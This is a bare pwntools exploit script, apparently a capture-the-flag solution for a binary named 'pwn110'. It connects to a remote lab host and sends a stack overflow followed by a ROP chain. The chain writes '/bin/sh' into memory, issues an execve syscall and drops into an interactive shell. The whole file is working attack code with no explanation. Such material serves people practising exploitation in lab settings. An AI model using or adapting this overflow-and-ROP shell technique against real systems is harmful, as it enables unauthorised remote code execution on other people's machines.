#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./pwn110", checksec=False)
# r = process()
r = remote("10.10.42.182", 9010)

# funcs
s = lambda a: r.sendline(a)

# gadgets
mov_q_ptr_rsi_rdi = 0x44629f
syscall = 0x4173d4
pop_rdi = 0x40191a
pop_rsi = 0x40f4de
pop_rax = 0x4497d7
pop_rdx = 0x40181f

# buf
buf = b"A"*40
buf += p64(pop_rdi)
buf += p64(0x4c3500)
buf += p64(pop_rsi)
buf += b"/bin/sh\0"
buf += p64(mov_q_ptr_rsi_rdi)
buf += p64(pop_rax)
buf += p64(59)
buf += p64(pop_rsi)
buf += p64(0)
buf += p64(pop_rdx)
buf += p64(0)
buf += p64(syscall)
s(buf)

r.interactive()